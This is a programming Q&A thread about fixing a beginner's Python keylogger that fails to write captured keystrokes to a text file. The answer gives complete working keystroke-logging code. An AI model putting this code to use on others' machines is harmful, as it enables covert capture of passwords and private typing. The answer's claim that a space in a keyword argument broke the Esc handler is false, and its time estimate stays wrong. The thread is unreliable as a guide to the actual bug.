# Keylogger won´t save to text file,made in python

Tags: python, keylogger

so i tried making a keylogger,but it won´t save to the text file.

First time making a keylogger,already watched some tutorials but i can´t figure out why it doesn´t work.

this is my complete code

```
import pynput

from pynput.keyboard import Key, Listener

count = 0
keys = []

def on_press(key):
   global keys, count

   keys.append(key)
   count += 1
   print("{0} pressed", format(key))

   if count >= 999999999999999999999999999999999999999999:
       count = 0
       write_file(keys)
       keys = []


def write_file():
    with open("log.txt", "a") as f:
        for key in keys:
            k = str(key).replace("'","")
            if k.find("space") > 0:
                f.write('\n')
            elif k.find("Key") == -1:
                f.write(k)


def on_release(key):
    if key == Key.esc:
        return False


with Listener(on_press=on_press, on_release =on_release) as listener:
    listener.join()
```

There are no errors showing in pycharm...

Comment: The file is only written once 999999999999999999999999999999999999999999 keys have been pressed, which is an awfully big number.

Answer (score 3):

As John Gordon pointed out in the comments, your keylogger isn't saving until you've collected more than 999999999999999999999999999999999999999999 keys. At three keys a second, nonstop, that'll take about <del>a year</del> ten million billion years to type, and would create a file <del>almost exactly 1GB</del> *10 thousand trillion trillion GB* in size. According to a typing speed test, however, people type on average [190-200 characters (not words) per minute](https://www.livechatinc.com/typing-speed-test/#/) - why not save every 15 seconds or so, after 50 characters? You can change this to whatever you'd like.

I also noted that your program was not terminating properly - you left a stray space in your `with Listener` invocation at `on_release =on_release`, which prevented the keylogger from capturing the `esc` key (and thereby also prevented the keylogger from being killed, except with `ctrl-z`).

This modified code ran well on my machine, and captured all my input. Spooky!

```py
import pynput

from pynput.keyboard import Key, Listener

count = 0
keys = []

def on_press(key):
   global keys, count

   keys.append(key)
   count += 1
   print("{0} pressed", format(key))

   #change this to whatever you want, knowing the average person types at 
   #190-200 characters per minute. Following that logic, this logger will save every 
   #15 seconds or so during normal typing.
   if count >= 50:
       count = 0
       write_file()
       keys = []


def write_file():
    with open("log.txt", "a") as f:
        for key in keys:
            k = str(key).replace("'","")
            if k.find("space") > 0:
                f.write('\n')
            elif k.find("Key") == -1:
                f.write(k)


def on_release(key):
    if key == Key.esc:
        return False


#note that if you leave a space, like "on_release =on_release", the listener won't
#understand your on_release function and will ignore it
with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```

Good luck!

Comment: 1 GB? You're off by a bit. 999999999999999999999999999999999999999999 bytes is a large enough quantity that there aren't any well-defined terms for it. It's roughly 10^21 times more storage than exists on the planet.

Comment: @duskwuff Google screwed me over! Updating the answer now. Thanks for catching that.

Comment: You'll need to correct the time as well. ~10^42 seconds is longer than the expected lifetime of the universe.

Comment: @duskwuff Really not sure why Google rounded so badly, bur you're right again, back to the edit board I go.

Comment: @koki That's a pretty vague question! What in specific isn't working for you?

Comment: @NickReed Not writing to file

Comment: @koki can't help with that without seeing how your code looks - consider opening a new question on SO.